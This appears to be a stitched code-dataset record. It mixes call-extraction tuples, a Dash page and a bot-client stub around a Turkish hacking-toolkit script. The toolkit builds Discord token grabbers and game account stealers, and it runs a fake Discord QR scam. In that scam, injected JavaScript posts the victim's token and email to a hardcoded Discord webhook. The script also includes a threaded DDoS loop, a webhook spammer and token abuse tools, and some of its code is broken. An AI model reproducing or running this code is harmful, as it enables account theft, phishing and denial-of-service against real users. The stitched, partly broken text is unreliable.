[((535, 564), 'os.path.join', 'os.path.join', (['root', 'data_list'], {}), '(root, data_list)\n', (547, 564), False, 'import os\n'), ((593, 620), 'os.path.join', 'os.path.join', (['root', 'img_dir'], {}), '(root, img_dir)\n', (605, 620), False, 'import os\n'), ((652, 682), 'os.path.join', 'os.path.join', (['root', 'target_dir'], {}), '(root, target_dir)\n', (664, 682), False, 'import os\n'), ((779, 809), 'os.path.isfile', 'os.path.isfile', (['self.data_list'], {}), '(self.data_list)\n', (793, 809), False, 'import os\n'), ((1539, 1563), 'torchvision.datasets.folder.default_loader', 'default_loader', (['img_path'], {}), '(img_path)\n', (1553, 1563), False, 'from torchvision.datasets.folder import default_loader\n'), ((1001, 1042), 'os.path.join', 'os.path.join', (['self.img_dir_path', 'img_name'], {}), '(self.img_dir_path, img_name)\n', (1013, 1042), False, 'import os\n')]
|
from dash import html, dcc
import dash_bootstrap_components as dbc
import pandas as pd
from .demo import blueprint as spa
global_md = """\
### Global Warming
Global Temperature Time Series. Data are included from the GISS
Surface Temperature (GISTEMP) analysis and the global component
of Climate at a Glance (GCAG). Two datasets are provided:
* Global monthly mean
* Annual mean temperature anomalies in degrees Celsius from 1880 to the present
"""
# Taken from Dash example, see:
# https://dash.plot.ly/datatable
df = pd.read_csv('demo/data/solar.csv')
@spa.route('/solar', title='Solar')
def solar():
return html.Div([
html.Div([
html.Div([], className="col-md-2"),
html.Div([
html.H2('US Solar Capacity'),
html.Br(),
dbc.Table.from_dataframe(df, striped=True, bordered=True, hover=True),
html.Div(id='output')
], className="col-md-8"),
html.Div([], className="col-md-2")
], className='row'),
dbc.Row([
dbc.Col([
dcc.Link("Global Warming", href=spa.url_for('warming'), className="btn btn-primary float-end")
], md=12)
])
], className="container-fluid")
|
[
"dash.html.H2",
"pandas.read_csv",
"dash.html.Div",
"dash_bootstrap_components.Table.from_dataframe",
"dash.html.Br"
] |
[((527, 561), 'pandas.read_csv', 'pd.read_csv', (['"""demo/data/solar.csv"""'], {}), "('demo/data/solar.csv')\n", (538, 561), True, 'import pandas as pd\n'), ((665, 699), 'dash.html.Div', 'html.Div', (['[]'], {'className': '"""col-md-2"""'}), "([], className='col-md-2')\n", (673, 699), False, 'from dash import html, dcc\n'), ((972, 1006), 'dash.html.Div', 'html.Div', (['[]'], {'className': '"""col-md-2"""'}), "([], className='col-md-2')\n", (980, 1006), False, 'from dash import html, dcc\n'), ((740, 768), 'dash.html.H2', 'html.H2', (['"""US Solar Capacity"""'], {}), "('US Solar Capacity')\n", (747, 768), False, 'from dash import html, dcc\n'), ((786, 795), 'dash.html.Br', 'html.Br', ([], {}), '()\n', (793, 795), False, 'from dash import html, dcc\n'), ((813, 882), 'dash_bootstrap_components.Table.from_dataframe', 'dbc.Table.from_dataframe', (['df'], {'striped': '(True)', 'bordered': '(True)', 'hover': '(True)'}), '(df, striped=True, bordered=True, hover=True)\n', (837, 882), True, 'import dash_bootstrap_components as dbc\n'), ((900, 921), 'dash.html.Div', 'html.Div', ([], {'id': '"""output"""'}), "(id='output')\n", (908, 921), False, 'from dash import html, dcc\n')]
|
import os
from licensing.models import *
from licensing.methods import Key, Helpers
from PIL import Image, ImageFont, ImageDraw
import sys
import time
from colorama import Fore, Back, Style, init
import shutil
import sys
import os
import requests
import shutil
from bs4 import BeautifulSoup
from requests import get
init(autoreset=True)
import requests
a = 5
b = 6
if a == b:
print("burası eskiden lisans key sistemi oldugu için kodları bozulmaması için kaldı")
#hehe deneme
else:
ShowText = 'CASPERSS AREA'
API_ENDPOINT = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
APPDATA = os.getenv("APPDATA")
def _get_real_direct_link(sharing_link):
pk_request = requests.get(API_ENDPOINT.format(sharing_link))
# Returns None if the link cannot be "converted"
return pk_request.json().get('href')
def _extract_filename(direct_link):
for chunk in direct_link.strip().split('&'):
if chunk.startswith('filename='):
return chunk.split('=')[1]
return None
def download_yandex_link(sharing_link, filename=None):
direct_link = _get_real_direct_link(sharing_link)
if direct_link:
filename = filename or _extract_filename(direct_link)
download = requests.get(direct_link)
os.chdir(APPDATA)
with open(filename, 'wb') as out_file:
out_file.write(download.content)
print('İndirildi exploit "{}" "{}"')
else:
print('Bağlantını Kontrol et "{}"')
def Spinner():
l = ['|', '/', '-', '\\']
for i in l + l + l:
sys.stdout.write(f"""\r# Yükleniyor... {i}""")
sys.stdout.flush()
time.sleep(0.4)
font = ImageFont.truetype('arialbd.ttf', 15)
size = font.getsize(ShowText)
image = Image.new('1', size, 1)
draw = ImageDraw.Draw(image)
draw.text((0, 0), ShowText, font=font)
for rownum in range(size[1]):
line = []
for colnum in range(size[0]):
if image.getpixel((colnum, rownum)):
line.append(' '),
else:
line.append('#'),
print(Fore.LIGHTGREEN_EX + ''.join(line))
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(
Fore.RED + "https://discord.gg/X8KjZJ3J2U ----- https://github.com/Casper-dev172 ------- doldoldol#3909(CASMO#9663)")
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(Fore.CYAN + "Welcome CASMO AREA")
print(Fore.MAGENTA + "[1] Rat")
print(Fore.MAGENTA + "[2] Discord Token Grabber")
print(Fore.MAGENTA + "[3] Fake QR Scam")
print(Fore.MAGENTA + "[4] Sbo Fucker v2")
print(Fore.MAGENTA + "[5] Craftrise Account Stealer")
print(Fore.MAGENTA + "[6] Fastfingers word hack")
print(Fore.MAGENTA + "[7] İd to token")
print(Fore.MAGENTA + "[8] Website Cloner")
print(Fore.MAGENTA + "[9] DDOS ATTACK!")
print(Fore.MAGENTA + "[10] DİSCORD TOKEN WORLD!")
print(Fore.MAGENTA+"[11] Discord Webhook spammer")
anan = os.getcwd()
x = input()
if x == "1":
Spinner()
print("Bu Geliştirme Sürecindedir yakında gelecektir.")
if x == "2":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/RyoA8MTLfGNlVw")
download_yandex_link("https://disk.yandex.com.tr/d/6lTr5TINtpbD2Q")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("sasa.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup.py build")
time.sleep(15)
os.remove("sasa.py")
os.remove("setup.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "5":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/6pSN66uFNLuIaQ")
download_yandex_link("https://disk.yandex.com.tr/d/4Nw7r50OrLwCzw")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("cr.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup1.py build")
time.sleep(15)
os.remove("cr.py")
os.remove("setup1.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "3":
Spinner()
print(
Fore.BLUE + "[BİLGİ]Bu uygulamada chrome açılacaktır sekmeyi kesinlikle kapatmamalısınız discord_gift.png oluşturulduktan sonra kurbana attıktan sonra kurban okuttuğu zaman o açılan chrome sekmesinde kullanıcının hesabına giriş yapmış olcaksınızdır"
"ve cmd de bir kaç hata belirebilir onlara aldırış etmeyin ve tadını çıkarın ")
time.sleep(5)
from bs4 import BeautifulSoup
from selenium import webdriver
from PIL import Image
import base64
import time
import os
def qr_hazırla():
im1 = Image.open('temp/resim1.png', 'r')
im2 = Image.open('temp/logo.png', 'r')
im2_w, im2_h = im2.size
im1.paste(im2, (60, 55))
im1.save('temp/anan.png', quality=95)
def bindir():
im1 = Image.open('temp/template.png', 'r')
im2 = Image.open('temp/anan.png', 'r')
im1.paste(im2, (120, 409))
im1.save('discord_gift.png', quality=95)
def main():
print('FAKE QR SCAM\n')
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
print('Sayfa Yüklendi')
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = soup.find('img')['src']
file = os.path.join(os.getcwd(), 'temp/resim1.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file, 'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
qr_hazırla()
bindir()
print('Gift Code Oluşturuldu Klasörü kontrol ediniz.')
print('QR code oluşturuldu kurbanın okutmasını bekleyiniz.')
while True:
time.sleep(6)
if discord_login != driver.current_url:
print('tokenı çekiyooorummm')
driver.execute_script('''
location.reload();
var discordWebhook = "https://discord.com/api/webhooks/939082111149809715/arZ4T9gWDAVVcrifcg_w7eO4nS7pu2NsL8BfqSu-XtjGkuwMBZQ6-oFQFwF5Clt0PxA5";
var i = document.createElement('iframe');
document.body.appendChild(i);
var request = new XMLHttpRequest();
request.open("POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
username: "Token Grabber",
avatar_url: "https://malwarefox.com/wp-content/uploads/2017/11/hacker-1.png",
content: '**OMG HEÇKIR APİĞĞĞ!**\n------------------\nToken : ' + i.contentWindow.localStorage.token + '\n------------------\nAdresse email : ' + i.contentWindow.localStorage.email_cache
};
request.send(JSON.stringify(params));
''')
print('---')
print("çekkkkkkkkktimmmmmmmmmm:")
break
print('İş bitti')
if __name__ == '__main__':
main()
if x == "4":
Spinner()
download_yandex_link("https://disk.yandex.com.tr/d/ylx0-4Q93wrnFA")
download_yandex_link("https://disk.yandex.com.tr/d/s_gD3XvCcs6yVg")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
os.system("python setup2.py build")
time.sleep(15)
os.remove("sbo.py")
os.remove("setup2.py")
shutil.move(f"{APPDATA}\\build", anan)
print("İşlem bitti dikkat et kendin açma :)")
if x == "6":
Spinner()
print("Bu chromedriver ürünüdür eğer sürümle alakalı hata alırsanız chromedriverın sitesine gidip kendi chrome sürümünüze uygun chromedriverı yükleyip klasöerlin içine atınız")
print("fastfingers email giriniz")
e = input()
print("fastfingers paralo giriniz")
p = input()
from selenium import webdriver
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
options = webdriver.ChromeOptions()
driver = webdriver.Chrome()
driver.maximize_window();
email = e
password = p
driver.get("https://10fastfingers.com/login");
driver.find_element_by_name("data[User][email]").send_keys(email)
driver.find_element_by_name("data[User][password]").send_keys(password)
driver.find_element_by_id("login-form-submit").click()
time.sleep(1)
driver.get("https://10fastfingers.com/typing-test/turkish");
wait = WebDriverWait(driver, 10)
inputElement = wait.until(EC.presence_of_element_located((By.ID, "inputfield")))
time.sleep(4)
word_list = driver.execute_script("return words")
number = 0;
for word in word_list:
inputElement.send_keys(word + " ")
if x =="7":
Spinner()
print(Fore.RED+"bu sadece tokenın ilk baştaki karakterleri verir 2 faktörlü doğrulamalı hesaplarda kullanılamaz")
import base64
userid = input(Fore.LIGHTYELLOW_EX+" İd gir : ")
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
print(Fore.LIGHTYELLOW_EX+f'\n tokenın başı: {encodedStr}')
if x =="8":
Spinner()
print("bazı hatalar olabilir eğer sıkıntı olursa bize ulaşınız")
print("site giriniz https://casperss.cf şeklinde")
x = input()
print("hangi klasör e kaydetmek istiyorsunuz")
y = input()
base_dir = os.getcwd()
site_name = x
project_name = y
project_path = "../" + project_name
os.makedirs(project_path, exist_ok=True)
visited_links = []
error_links = []
def save(bs, element, check):
links = bs.find_all(element)
for l in links:
href = l.get("href")
if href is not None and href not in visited_links:
if check in href:
href = l.get("href")
print("indiriliyor: {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
f.write(r.text.encode('utf-8'))
f.close()
visited_links.append(l)
def save_assets(html_text):
bs = BeautifulSoup(html_text, "html.parser")
save(bs=bs, element="link", check=".css")
save(bs=bs, element="script", check=".js")
links = bs.find_all("img")
for l in links:
href = l.get("src")
if href is not None and href not in visited_links:
print("indiriliyor : {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l, stream=True)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
shutil.copyfileobj(r.raw, f)
visited_links.append(l)
def crawl(link):
if "http://" not in link and "https://" not in link:
link = site_name + link
if site_name in link and link not in visited_links:
print("indiriliyor : {}".format(link))
path_s = link.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
if file_name[len(file_name) - 1] != "/":
file_name = file_name + "/"
try:
r = requests.get(link)
except requests.exceptions.ConnectionError:
print("bağlantı hatası (cloudflare under attack mode açık olabilir)")
sys.exit(1)
if r.status_code != 200:
print("site yanlış")
sys.exit(1)
print(project_path + file_name + "index.html")
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0] + "index.html", "wb") as f:
text = r.text.replace(site_name, project_name)
f.write(text.encode('utf-8'))
f.close()
visited_links.append(link)
save_assets(r.text)
soup = BeautifulSoup(r.text, "html.parser")
for link in soup.find_all('a'):
try:
crawl(link.get("href"))
except:
error_links.append(link.get("href"))
crawl(site_name + "/")
for link in visited_links:
print("---- {}\n".format(link))
print("\n\n\nhata\n")
for link in error_links:
print("---- {}\n".format(link))
if x == "9":
Spinner()
ddoser = input("Hedef site giriniz örnek.com:")
import socket
import threading
ip = get('https://api.ipify.org').text
target = 'casperss.cf'
fake_ip = ip
port = 80
attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print(attack_num)
s.close()
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
if x == "10":
Spinner()
print(Fore.MAGENTA + "[1] Token sese sokma")
print(Fore.MAGENTA + "[2] Token yayına sokma")
print(Fore.MAGENTA + "[3] Token sunucuya sokma")
print(Fore.MAGENTA + "[4] About me kısımlarına yazı yazma")
supra = input()
if supra == "3":
print("tokenler.txt ye tokenlarını at")
print("discord invite link giriniz lütfen sadece davet kodunu atınız ( örnek = 21312dwadqw)")
ananxd = input()
tokens = []
with open("tokenler.txt", "r") as tokens_file:
lines = tokens_file.readlines()
for l in lines:
token = tokens.append(l.replace('\n', ''))
def bot_inviter(ananxd,token):
apilink = "https://discordapp.com/api/v6/invite/" + ananxd
headers = {'Authorization': token}
bot_invite = requests.post(apilink, headers=headers)
print(bot_invite.text)
for botz in tokens:
bot_inviter(ananxd, botz)
if supra =="1":
import discord
class MyClient(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
time.sleep(5)
print('Bot joined the channel.')
channel_id = '929783813024935941'
voice_channel = client.get_channel(channel_id)
await voice_channel.connect()
async def on_message(self, message):
# don't respond to ourselves
if message.author == self.user:
return
if message.content == 'ping':
await message.channel.send('pong')
client = MyClient()
client.run('')
print("çabuk çabuk ses kanalıan gir oç")
if x == "11":
import time
import requests
import pyfiglet
banner = pyfiglet.figlet_format("WEBHOOK SPAMMER")
print(banner)
msg = input("ne spamlamasını istiyorsun keke:")
webhook = input()
def kırbaçlaonu(msg, webhook):
while True:
try:
data = requests.post(webhook, json={'content': msg})
if data.status_code == 204:
print(f"gonderildu{msg}")
except:
print("webhook bozuk:" + webhook)
time.sleep(5)
exit()
anan = 1
while anan == 1:
kırbaçlaonu(msg, webhook)
|
[
"sys.stdout.write",
"PIL.Image.new",
"os.remove",
"socket.socket",
"pyfiglet.figlet_format",
"selenium.webdriver.ChromeOptions",
"sys.stdout.flush",
"requests.post",
"os.chdir",
"colorama.init",
"requests.get",
"PIL.ImageDraw.Draw",
"shutil.copyfileobj",
"threading.Thread",
"os.system",
"time.sleep",
"bs4.BeautifulSoup",
"selenium.webdriver.support.ui.WebDriverWait",
"os.getenv",
"sys.exit",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"os.makedirs",
"os.getcwd",
"PIL.Image.open",
"PIL.ImageFont.truetype",
"shutil.move",
"selenium.webdriver.Chrome"
] |
[((338, 358), 'colorama.init', 'init', ([], {'autoreset': '(True)'}), '(autoreset=True)\n', (342, 358), False, 'from colorama import Fore, Back, Style, init\n'), ((684, 704), 'os.getenv', 'os.getenv', (['"""APPDATA"""'], {}), "('APPDATA')\n", (693, 704), False, 'import os\n'), ((1884, 1921), 'PIL.ImageFont.truetype', 'ImageFont.truetype', (['"""arialbd.ttf"""', '(15)'], {}), "('arialbd.ttf', 15)\n", (1902, 1921), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((1970, 1993), 'PIL.Image.new', 'Image.new', (['"""1"""', 'size', '(1)'], {}), "('1', size, 1)\n", (1979, 1993), False, 'from PIL import Image\n'), ((2006, 2027), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (2020, 2027), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((3344, 3355), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3353, 3355), False, 'import os\n'), ((3927, 3940), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3937, 3940), False, 'import time\n'), ((3950, 3967), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (3958, 3967), False, 'import os\n'), ((4211, 4228), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (4219, 4228), False, 'import os\n'), ((4238, 4272), 'os.system', 'os.system', (['"""python setup.py build"""'], {}), "('python setup.py build')\n", (4247, 4272), False, 'import os\n'), ((4282, 4296), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (4292, 4296), False, 'import time\n'), ((4306, 4326), 'os.remove', 'os.remove', (['"""sasa.py"""'], {}), "('sasa.py')\n", (4315, 4326), False, 'import os\n'), ((4336, 4357), 'os.remove', 'os.remove', (['"""setup.py"""'], {}), "('setup.py')\n", (4345, 4357), False, 'import os\n'), ((4367, 4405), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (4378, 4405), False, 'import shutil\n'), ((4911, 4924), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4921, 4924), False, 'import time\n'), ((4936, 4953), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (4944, 4953), False, 'import os\n'), ((5193, 5210), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (5201, 5210), False, 'import os\n'), ((5220, 5255), 'os.system', 'os.system', (['"""python setup1.py build"""'], {}), "('python setup1.py build')\n", (5229, 5255), False, 'import os\n'), ((5265, 5279), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (5275, 5279), False, 'import time\n'), ((5289, 5307), 'os.remove', 'os.remove', (['"""cr.py"""'], {}), "('cr.py')\n", (5298, 5307), False, 'import os\n'), ((5317, 5339), 'os.remove', 'os.remove', (['"""setup1.py"""'], {}), "('setup1.py')\n", (5326, 5339), False, 'import os\n'), ((5349, 5387), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (5360, 5387), False, 'import shutil\n'), ((5875, 5888), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5885, 5888), False, 'import time\n'), ((9441, 9454), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (9451, 9454), False, 'import time\n'), ((9464, 9481), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (9472, 9481), False, 'import os\n'), ((9491, 9526), 'os.system', 'os.system', (['"""python setup2.py build"""'], {}), "('python setup2.py build')\n", (9500, 9526), False, 'import os\n'), ((9536, 9550), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (9546, 9550), False, 'import time\n'), ((9560, 9579), 'os.remove', 'os.remove', (['"""sbo.py"""'], {}), "('sbo.py')\n", (9569, 9579), False, 'import os\n'), 
((9589, 9611), 'os.remove', 'os.remove', (['"""setup2.py"""'], {}), "('setup2.py')\n", (9598, 9611), False, 'import os\n'), ((9621, 9659), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (9632, 9659), False, 'import shutil\n'), ((10343, 10368), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (10366, 10368), False, 'from selenium import webdriver\n'), ((10387, 10405), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (10403, 10405), False, 'from selenium import webdriver\n'), ((10769, 10782), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (10779, 10782), False, 'import time\n'), ((10869, 10894), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(10)'], {}), '(driver, 10)\n', (10882, 10894), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((10994, 11007), 'time.sleep', 'time.sleep', (['(4)'], {}), '(4)\n', (11004, 11007), False, 'import time\n'), ((11881, 11892), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (11890, 11892), False, 'import os\n'), ((12000, 12040), 'os.makedirs', 'os.makedirs', (['project_path'], {'exist_ok': '(True)'}), '(project_path, exist_ok=True)\n', (12011, 12040), False, 'import os\n'), ((20068, 20109), 'pyfiglet.figlet_format', 'pyfiglet.figlet_format', (['"""WEBHOOK SPAMMER"""'], {}), "('WEBHOOK SPAMMER')\n", (20090, 20109), False, 'import pyfiglet\n'), ((1385, 1410), 'requests.get', 'requests.get', (['direct_link'], {}), '(direct_link)\n', (1397, 1410), False, 'import requests\n'), ((1424, 1441), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (1432, 1441), False, 'import os\n'), ((1760, 1802), 'sys.stdout.write', 'sys.stdout.write', (["f'\\r# Yükleniyor... {i}'"], {}), "(f'\\r# Yükleniyor... 
{i}')\n", (1776, 1802), False, 'import sys\n'), ((1820, 1838), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1836, 1838), False, 'import sys\n'), ((1852, 1867), 'time.sleep', 'time.sleep', (['(0.4)'], {}), '(0.4)\n', (1862, 1867), False, 'import time\n'), ((6112, 6146), 'PIL.Image.open', 'Image.open', (['"""temp/resim1.png"""', '"""r"""'], {}), "('temp/resim1.png', 'r')\n", (6122, 6146), False, 'from PIL import Image\n'), ((6166, 6198), 'PIL.Image.open', 'Image.open', (['"""temp/logo.png"""', '"""r"""'], {}), "('temp/logo.png', 'r')\n", (6176, 6198), False, 'from PIL import Image\n'), ((6371, 6407), 'PIL.Image.open', 'Image.open', (['"""temp/template.png"""', '"""r"""'], {}), "('temp/template.png', 'r')\n", (6381, 6407), False, 'from PIL import Image\n'), ((6427, 6459), 'PIL.Image.open', 'Image.open', (['"""temp/anan.png"""', '"""r"""'], {}), "('temp/anan.png', 'r')\n", (6437, 6459), False, 'from PIL import Image\n'), ((6641, 6666), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (6664, 6666), False, 'from selenium import webdriver\n'), ((6834, 6903), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'options': 'options', 'executable_path': '"""chromedriver.exe"""'}), "(options=options, executable_path='chromedriver.exe')\n", (6850, 6903), False, 'from selenium import webdriver\n'), ((6973, 6986), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (6983, 6986), False, 'import time\n'), ((7094, 7137), 'bs4.BeautifulSoup', 'BeautifulSoup', (['page_source'], {'features': '"""lxml"""'}), "(page_source, features='lxml')\n", (7107, 7137), False, 'from bs4 import BeautifulSoup\n'), ((10930, 10983), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (["(By.ID, 'inputfield')"], {}), "((By.ID, 'inputfield'))\n", (10960, 10983), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((13659, 13698), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html_text', '"""html.parser"""'], {}), "(html_text, 'html.parser')\n", (13672, 13698), False, 'from bs4 import BeautifulSoup\n'), ((17165, 17193), 'requests.get', 'get', (['"""https://api.ipify.org"""'], {}), "('https://api.ipify.org')\n", (17168, 17193), False, 'from requests import get\n'), ((17843, 17874), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (17859, 17874), False, 'import threading\n'), ((7284, 7295), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7293, 7295), False, 'import os\n'), ((7782, 7795), 'time.sleep', 'time.sleep', (['(6)'], {}), '(6)\n', (7792, 7795), False, 'import time\n'), ((16517, 16553), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.text', '"""html.parser"""'], {}), "(r.text, 'html.parser')\n", (16530, 16553), False, 'from bs4 import BeautifulSoup\n'), ((17375, 17424), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (17388, 17424), False, 'import socket\n'), ((18887, 18926), 'requests.post', 'requests.post', (['apilink'], {'headers': 'headers'}), '(apilink, headers=headers)\n', (18900, 18926), False, 'import requests\n'), ((15674, 15692), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (15686, 15692), False, 'import requests\n'), ((15985, 15996), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (15993, 15996), False, 'import sys\n'), ((19273, 19286), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (19283, 19286), False, 'import time\n'), ((20336, 20381), 'requests.post', 
'requests.post', (['webhook'], {'json': "{'content': msg}"}), "(webhook, json={'content': msg})\n", (20349, 20381), False, 'import requests\n'), ((14475, 14503), 'requests.get', 'requests.get', (['l'], {'stream': '(True)'}), '(l, stream=True)\n', (14487, 14503), False, 'import requests\n'), ((14994, 15022), 'shutil.copyfileobj', 'shutil.copyfileobj', (['r.raw', 'f'], {}), '(r.raw, f)\n', (15012, 15022), False, 'import shutil\n'), ((15866, 15877), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (15874, 15877), False, 'import sys\n'), ((20583, 20596), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (20593, 20596), False, 'import time\n'), ((12936, 12951), 'requests.get', 'requests.get', (['l'], {}), '(l)\n', (12948, 12951), False, 'import requests\n')]
|
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
import http.server
import json
import asyncio
from botbuilder.schema import (Activity, ActivityTypes)
from botframework.connector import ConnectorClient
from botframework.connector.auth import (MicrosoftAppCredentials, JwtTokenValidation, SimpleCredentialProvider)
from programy.clients.restful.flask.client import FlaskRestBotClient
from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration
class MicrosoftBotClient(FlaskRestBotClient):
def __init__(self, argument_parser=None):
FlaskRestBotClient.__init__(self, 'microsoft', argument_parser)
YLogger.debug(self, "Microsoft Client is running....")
print("Microsoft Client loaded")
